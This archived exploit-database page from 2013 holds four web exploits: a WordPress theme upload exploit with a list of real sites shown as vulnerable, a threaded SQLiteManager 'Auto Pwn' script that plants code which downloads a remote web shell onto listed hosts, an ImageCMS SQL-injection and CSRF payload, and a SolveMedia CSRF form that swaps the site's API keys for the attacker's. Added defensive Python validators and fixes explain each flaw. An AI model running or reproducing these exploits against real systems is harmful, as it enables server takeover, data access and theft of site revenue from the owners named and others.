Archive for 25 January 2013

WordPress theme sandbox Arbitrary File Upload Vulnerability

An arbitrary file upload vulnerability was found in the WordPress "sandbox" theme, in the Uploadify component it ships under js/uploadify/. The upload handler (uploadify.php) accepts a POSTed file without any authentication, so an attacker can upload a PHP shell and gain access to the server.
Note that the double extension used in the exploit below (cyber.php.gif) only runs as PHP where the web server maps the inner ".php" part to the PHP handler, as Apache's AddHandler directive does; a handler keyed on the final extension only will serve it as an image. The mitigation therefore has two parts: create a .htaccess file in the WordPress upload directories that denies script execution for names such as php.php, php.gif and php.jpg, and remove or access-restrict the uploadify.php endpoint itself, since the .htaccess rule does nothing for files written next to the handler in the theme directory.
The description of the vulnerability and its exploit follow.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm The Black Devils member from Inj3ct0r Team         1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: WordPress theme sandbox Arbitrary File Upload/FD Vulnerability
# Date: 21/12/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ webapps ]
# Dork : inurl:wp-content/themes/sandbox
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------
<?php
// Uploads a local file named cyber.php.gif to the theme's unauthenticated
// Uploadify handler. The "@file" form of CURLOPT_POSTFIELDS is the pre-PHP 5.5
// way of sending a multipart file upload; PHP 5.5 introduced CURLFile for it
// and later versions disable the "@" prefix by default.
$uploadfile="cyber.php.gif";
$ch = curl_init("http://localhost/wp-content/themes/sandbox/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));   // "Filedata" is the form field the handler reads
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);          // handler's response (the stored file name on success)
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/wp-content/themes/sandbox/js/uploadify/cyber.php.gif
Contents of cyber.php.gif (runs only where the server maps the inner .php to PHP):
<?php
phpinfo();
?>
#------------------
Demo 
 
http://www.les-monstres.us/wp-content/themes/sandbox/header.php
http://teavalecottages.co.ke/wp-content/themes/sandbox/header.php
http://www.dealmatters.com/temp/wp-content/themes/sandbox/header.php
http://divine-worx.com/wp-content/themes/sandbox/header.php
 
http://teavalecottages.co.ke/wp-content/themes/sandbox/js/uploadify/uploadify.php
http://www.les-monstres.us/wp-content/themes/sandbox/js/uploadify/uploadify.php
http://www.infinityitpark.in/wp-content/themes/sandbox/js/uploadify/uploadify.php
 
 
 
 
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------
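The check that the Uploadify handler needed, as an added example written for this page (it is not code from the sandbox theme or from Uploadify), in Python so that it runs stand-alone. The allow-list, the magic-byte table and the random-name scheme are this example's assumptions. It treats every dotted part of the client-supplied name as an extension, which is what makes cyber.php.gif fail, checks the bytes against the claimed type, refuses image/PHP polyglots, and never writes the client's name to disk.

```python
import os
import secrets

# Constructed allow-list for this example: the image types a theme uploader
# has any business accepting. Anything else is rejected before it is written.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
MAGIC_BYTES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


class UploadRejected(ValueError):
    pass


def extensions_of(filename):
    """All dotted parts after the first, lower-cased, with directories stripped.
    'cyber.php.gif' -> ['php', 'gif']. Apache's AddHandler matches any part,
    so a check that looks only at the last one lets the exploit above through."""
    base = os.path.basename(filename.replace("\\", "/"))
    return [p.lower() for p in base.split(".")[1:]]


def validate_upload(filename, data):
    """Return the extension to store the bytes under, or raise UploadRejected."""
    exts = extensions_of(filename)
    if len(exts) != 1:  # no extension, or a double extension such as .php.gif
        raise UploadRejected("expected exactly one extension, got %r" % exts)
    ext = exts[0]
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension not allowed: %s" % ext)
    if not any(data.startswith(m) for m in MAGIC_BYTES[ext]):
        raise UploadRejected("content is not a %s image" % ext)
    if b"<?php" in data or b"<?=" in data:  # polyglot: valid image header, PHP body
        raise UploadRejected("PHP tag inside image data")
    return ext


def is_accepted(filename, data):
    """Boolean wrapper around validate_upload for callers that only need a verdict."""
    try:
        validate_upload(filename, data)
        return True
    except UploadRejected:
        return False


def store_upload(filename, data, upload_dir):
    """Write under a server-chosen random name so nothing client-controlled
    reaches the filesystem, and return that name."""
    ext = validate_upload(filename, data)
    new_name = "%s.%s" % (secrets.token_hex(16), ext)
    with open(os.path.join(upload_dir, new_name), "wb") as fh:
        fh.write(data)
    return new_name
```

The validation belongs in the handler, not only in .htaccess: the server-side check stops the file from ever landing in the web root, while the .htaccess rule from the introduction is the second layer for files that are already there.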

SQLiteManager 1.2.4 Remote PHP Code Injection Vulnerability

A remote PHP code injection vulnerability was found in SQLiteManager 1.2.4. The application creates a new database at whatever file name is posted in the dbpath parameter (./include/add_database.php), so an attacker can create a database with a .php name, store PHP source in it and have the web server execute it, uploading a PHP shell and obtaining full access to the server. Where the vulnerability arises, the description and the exploit are as follows:

Description:
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:
 
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
 
Name: Ampps
Official Site: http://www.ampps.com/
 
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================
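Why the exploit below works, and what a stricter check than the one-line patch looks like, as an added example that is not SQLiteManager's code. The script posts dbpath=sql.php to create a database whose file name ends in .php, inserts a row whose text is PHP source, then requests the file over HTTP; SQLite stores the text verbatim inside the file, so the web server runs it. page_fix() is the advisory's patch transcribed to Python; validate_dbpath() is a hypothetical replacement that pins the file to a fixed extension and a fixed directory. The directory name and the naming rule are assumptions for this example.

```python
import os
import re


class BadDbPath(ValueError):
    pass


def page_fix(dbpath):
    """The one-line patch quoted above, in Python: strip every dot.
    'sql.php' becomes 'sqlphp', which the web server no longer hands to PHP,
    but any directory part survives and so does every other extension."""
    return dbpath.replace(".", "")


# Hypothetical naming rule for this example: short, alphanumeric, no dots.
DB_STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
DB_EXTENSION = ".db"


def validate_dbpath(base_dir, dbpath):
    """Return the absolute file to create for a user-supplied dbpath, or raise.
    The name is reduced to a checked stem plus a fixed extension and placed
    under base_dir, so neither the extension nor the directory is attacker-chosen.
    base_dir should itself live outside the document root."""
    if not isinstance(dbpath, str) or "\x00" in dbpath:
        raise BadDbPath("invalid input")
    if "/" in dbpath or "\\" in dbpath:
        raise BadDbPath("directory components are not allowed")
    stem, ext = os.path.splitext(dbpath)
    if ext and ext.lower() != DB_EXTENSION:
        raise BadDbPath("only %s files may be created, got %r" % (DB_EXTENSION, ext))
    if not DB_STEM_RE.match(stem):
        raise BadDbPath("database name must match %s" % DB_STEM_RE.pattern)
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, stem + DB_EXTENSION))
    if os.path.commonpath([base, target]) != base:  # belt and braces
        raise BadDbPath("path escapes %s" % base)
    return target


def is_valid_dbpath(base_dir, dbpath):
    """Boolean wrapper around validate_dbpath."""
    try:
        validate_dbpath(base_dir, dbpath)
        return True
    except BadDbPath:
        return False
```

Removing dots stops this particular payload, but the root cause is that a user-chosen string becomes a file name inside the web root. Keeping the databases outside the document root removes the code-execution path even if a future bypass of the name check is found.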
 
# Python 2 script (urllib2, print statement). Indentation restored; the
# original posting had lost it. Reads a list of host:port entries, finds a
# SQLiteManager instance on each, creates a database named sql.php containing
# PHP that fetches a shell from shellUrl, requests it so the shell is written,
# then deletes the database.
import re
import urllib2
from urllib import urlencode
from sys import argv, exit
from time import sleep
from threading import Thread, activeCount
from socket import setdefaulttimeout

def strip_tags(value):
    #Strip tags with RegEx
    return re.sub('<[^>]*?>', '', value)

def writeLog(log, msg):
    log.write(msg + '\r\n')
    log.flush()
    print msg

def getTextFile(txt):
    return txt.read().replace('\r', '').split('\n')

def getUrl(ip):
    #Try the usual install paths and return the first one that answers as SQLiteManager
    urlOptions = ['/sqlite/','/sqlitemanager/','/']
    for option in urlOptions:
        url = 'http://' + ip + option
        try:
            htmlRes = urllib2.urlopen(url, None, 120).read()
            if "SQLiteManager" in htmlRes:
                return url
        #Not Responding Error
        except Exception:
            continue
    return None

def getDbId(url, myDbName):
    #Find Components
    htmlRes = urllib2.urlopen(url, None, 120).read()
    if htmlRes:
        #If you found it take all the rows
        td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
        #Look for the row whose stripped name is our database
        for element in td:
            if strip_tags(element) == myDbName:
                #Return Id
                return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
    return None

def getOs(information):
    #Guess the OS from the response headers (Server line)
    information = str(information).lower()
    if "win32" in information:
        return "Win32"
    else:
        return "Linux / MacOSX"

def pwnIt(ip, activity, success):
    writeLog(activity, 'Now: %s' % ip)
    url = getUrl(ip)
    if not url:
        writeLog(activity, 'Error: %s sqlite not found' % ip)
        return

    myDbName  = "sqlphp"
    myDbFile  = "sql.php"
    shellName = "right.php"
    if len(argv) == 3:
        shellUrl  = argv[2]
    else:
        shellUrl  = "http://garr.dl.sourceforge.net/project/c37-shell/C37-1.3.php"
    #Create Database (the dbpath value is what add_database.php fails to validate)
    params = {'dbname'      : myDbName,
              'dbVersion'   : '2',
              'dbRealpath'  : None,
              'dbpath'      : myDbFile,
              'action'      : 'saveDb'}
    res = urllib2.urlopen(url + "main.php", urlencode(params), 120)
    #Get Operation System
    opSystem = getOs(res.info())
    #Get Database ID
    dbId = getDbId(url + "left.php", myDbName)
    #If Database Created
    if dbId:
        #Create Table + Shell Creator: the inserted text is stored verbatim in sql.php
        params = {'DisplayQuery'    : 'CREATE TABLE temptab ( codetab text );\n' + \
                  'INSERT INTO temptab VALUES (\'<?php $destination=fopen("%s","w");$source=fopen("%s","r");while ($a=fread($source,1024)) fwrite($destination,$a);fclose($source);fclose($destination);?>\');\n' %(shellName, shellUrl),
                  'sqlFile'         : None,
                  'action'          : 'sql',
                  'sqltype'         : '1'}
        urllib2.urlopen(url + "main.php?dbsel=%s&table=temptab" %dbId, urlencode(params), 120)
        #Create Shell: requesting sql.php runs the embedded PHP, which downloads the shell
        urllib2.urlopen(url + myDbFile, None, 120)
        #Remove Database
        urllib2.urlopen(url + "main.php?dbsel=%s&table=&view=&trigger=&function=&action=del" %dbId, None, 120)
        #Update Log
        writeLog(success, 'Success: %s - OS: %s' % (url + shellName, opSystem))
        return

    writeLog(activity, 'Fail: %s' % ip)

def main():
    if len(argv) < 2:
        filename = argv[0].replace('\\', '/').split('/')
        filename = filename[-1]

        print \
            'SQLiteManager Auto Pwn\n' + \
            'Made By TzAnAnY\n\n' + \
            'Execute Example: ' + filename + ' ips.txt\n' + \
            'Another Example: ' + filename + ' ips.txt FileURL\n' + \
            'ips.txt -> File with ip:port(Filtered)\n' + \
            'FileURL -> The Shell File URL\n' + \
            'All Activity logs on Activity.log\n' + \
            'All Success logs on Success.log'
        exit()

    ips = getTextFile(open(argv[1], 'r'))
    success = open('Success.log', 'a+b')
    activity = open('Activity.log', 'a+b')
    #Set Socket Time Out
    setdefaulttimeout(120)

    #At most 10 hosts are worked on at a time
    for ip in ips:
        Thread(target=pwnIt, args=(ip, activity, success)).start()
        while activeCount() >= 10:
            sleep(1)

if __name__ == '__main__':
    main()
 
# 93238C8D66448B3F   1337day.com [2013-01-26]   1F04097D9EC01067 #

ImageCMS 4.0.0b Multiple Vulnerabilities

An SQL injection vulnerability (CVE-2012-6290) was found in ImageCMS 4.0.0b. It is reachable by an authenticated administrator and, because the affected admin page is not protected against CSRF, by an unauthenticated attacker who gets an administrator to load a crafted page.
Where the injection arises and the exploit showing its use are given below.

Advisory ID: HTB23132
Product: ImageCMS
Vendor: www.imagecms.net
Vulnerable Version(s): 4.0.0b and probably prior
Tested Version: 4.0.0b
Vendor Notification: December 5, 2012 
Vendor Patch: January 16, 2013 
Public Disclosure: January 23, 2013 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2012-6290
Risk Level: Medium 
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in ImageCMS, which can be exploited to perform SQL injection attacks.


1)  SQL injection vulnerability in ImageCMS: CVE-2012-6290

The vulnerability exists due to insufficient filtration of the "q" HTTP GET parameter passed to "/admin/admin_search/". A remote authenticated administrator can execute arbitrary SQL commands in the application's database.

Depending on the database and system configuration PoC (Proof-of-Concept) code below will create "/tmp/file.txt" file with MySQL server version inside:


http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202


This vulnerability can also be exploited by a remote non-authenticated attacker via a CSRF vector, because the application is prone to Cross-Site Request Forgery. To do so the attacker should trick a logged-in administrator into visiting a web page with the CSRF exploit.

Basic CSRF exploit example:


<img src="http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202">
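The injection and its fix side by side, as an added example that is not ImageCMS's code. The table, the column count (3 rather than the advisory's 15) and the use of SQLite are this example's assumptions; sqlite_version() stands in for MySQL's version(), and INTO OUTFILE, the MySQL-only clause the advisory uses to write /tmp/file.txt, has no SQLite counterpart, so the payload reads the value back through the result set instead.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the table behind the admin search; it is not
    ImageCMS's schema."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE pages (id INTEGER, title TEXT, body TEXT)")
    con.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                    [(1, "Welcome", "hello"), (2, "Contact", "mail us")])
    return con


def admin_search_vulnerable(con, q):
    """The CWE-89 pattern behind CVE-2012-6290: q is spliced into the SQL text."""
    sql = "SELECT id, title, body FROM pages WHERE title LIKE '%" + q + "%'"
    return con.execute(sql).fetchall()


def admin_search_fixed(con, q):
    """Same search with q passed as a bound parameter: a quote in q is data."""
    sql = "SELECT id, title, body FROM pages WHERE title LIKE ?"
    return con.execute(sql, ("%" + q + "%",)).fetchall()


# The advisory's payload adapted to this table: the closing quote ends the
# LIKE pattern, UNION appends attacker-chosen columns, and "-- " comments out
# the trailing %'. The column count must match the original SELECT, which is
# why the real payload carries 15 values.
PAYLOAD = "123%' UNION SELECT 1, sqlite_version(), 3 -- "


def db_version(con):
    """What the attacker is after in this toy: the database version string."""
    return con.execute("SELECT sqlite_version()").fetchone()[0]
```

Binding the parameter removes the injection, but note what the advisory's CSRF variant relies on: the administrative search is a GET that an `<img>` tag can trigger. State-changing or sensitive admin endpoints should also require POST and a per-session anti-CSRF token, independently of the SQL fix.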


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to ImageCMS 4.2

More Information:
http://forum.imagecms.net/viewtopic.php?id=1436
http://www.imagecms.net/blog/news/reliz-imagecms-42-razgranichenie-prav-dostupa-i-drugie-novinki

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23132 - https://www.htbridge.com/advisory/HTB23132 - SQL Injection Vulnerability in ImageCMS.
[2] ImageCMS - http://www.imagecms.net - A free modern Web 3.0 content management system.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

WordPress SolveMedia 1.1.0 CSRF Vulnerability

A CSRF vulnerability was found in version 1.1.0 of the WordPress SolveMedia plugin. The plugin's settings page carries no anti-CSRF token, so an attacker can make a logged-in administrator's browser submit the form, replacing the site's SolveMedia API keys with the attacker's own and thereby diverting the site's SolveMedia revenue. The exploit code and how it is used are as follows:

# Exploit Title: WordPress SolveMedia 1.1.0 CSRF Vulnerability
# Release Date: 24/01/13
# Author: Junaid Hussain - [ illSecure Research Group ] -
# Contact: illSecResearchGroup@Gmail.com | Website: http://illSecure.com
# Software Link: http://downloads.wordpress.org/plugin/solvemedia.1.1.0.zip
# Vendor Homepage: http://solvemedia.com
# Tested on: CentOs 5
# Google Dork: inurl:wp-content/plugins/solvemedia
-----------------------------------------------------------------------------------------------------------------------
//##### Introduction: 
SolveMedia is a captcha service that allows webmasters to monetize
from correct captcha type-ins. solvemedia.admin.inc is vulnerable to CSRF:
there are no anti-CSRF tokens implemented, nor is the wp-nonce function used,
therefore an attacker can change the webmaster's SolveMedia API keys (public key,
private key, hash key) to the attacker's own set of API keys, thus stealing
the webmaster's SolveMedia revenue.
-------------------------------------------------------------------------------------------------------------------------
//##### CSRF - Proof Of Concept:
<html>
<form  method="post" action="http://server/wp-admin/plugins.php?page=solvemedia/solvemedia.admin.inc&updated=true">
<input name="adcopy_opt_pubkey" id="adcopy_opt_pubkey" size="40" value="[ ATTACKERS PUBLIC KEY ]" style="display:none;"/>                       
<input name="adcopy_opt_privkey" id="adcopy_opt_privkey" size="40" value="[ ATTACKERS PRIVATE KEY ]" style="display:none;"/>
<input name="adcopy_opt_hashkey" id="adcopy_opt_hashkey" size="40" value="[ ATTACKERS HASH KEY ]" style="display:none;" />
<input type="submit" name="submit" value="Enter" />	
</form>
</html>
\\##### End Poc #####
-------------------------------------------------------------------------------------------------------------------------
//##### Patch:
-- Vendor was notified on the 22/01/2013
-- Vendor released version 1.1.1 on 23/01/2013 which included a patch
--- Patched Version (1.1.1): http://wordpress.org/extend/plugins/solvemedia/
--- ChangeLog: http://wordpress.org/extend/plugins/solvemedia/changelog/
-------------------------------------------------------------------------------------------------------------------------
//##### Original: http://illSecure.com/code/Wordpress-SolveMedia-CSRF-Vulnerability.txt
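A nonce check of the kind the advisory says solvemedia.admin.inc lacks, as an added example (not the plugin's code and not WordPress's implementation). The session identifier, the server secret, the action name and the _wpnonce field name are assumptions; in a real plugin the equivalent is wp_nonce_field() in the form and check_admin_referer(), together with a current_user_can() check, before the options are saved. WordPress nonces are additionally time-limited, which this example omits.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret for this example; a real install keeps it in
# configuration (WordPress keys its nonces from the salts in wp-config.php).
SERVER_SECRET = secrets.token_bytes(32)
ACTION = "solvemedia_save_keys"
KEY_FIELDS = ("adcopy_opt_pubkey", "adcopy_opt_privkey", "adcopy_opt_hashkey")


def make_nonce(session_id, action):
    """Token tied to the logged-in session and to one form action. It is
    rendered into the legitimate settings page as a hidden field; a page on
    the attacker's origin cannot read it, so it cannot forge the POST."""
    msg = ("%s|%s" % (session_id, action)).encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()[:20]


def check_nonce(session_id, action, supplied):
    """Constant-time comparison; a missing token fails closed."""
    if not supplied:
        return False
    return hmac.compare_digest(make_nonce(session_id, action), supplied)


def save_keys(session_id, form, settings):
    """Stand-in for the settings save in solvemedia.admin.inc. `form` is the
    POST body as a dict and `settings` the stored options. Returns True only if
    the keys were updated; the PoC form above carries no nonce, so it is refused
    and the webmaster's keys stay in place."""
    if not check_nonce(session_id, ACTION, form.get("_wpnonce")):
        return False
    for field in KEY_FIELDS:
        if field in form:
            settings[field] = form[field]
    return True
```

The token is the only thing the attacker's page cannot supply: the browser attaches the administrator's cookies automatically, which is why authentication alone does not stop the PoC.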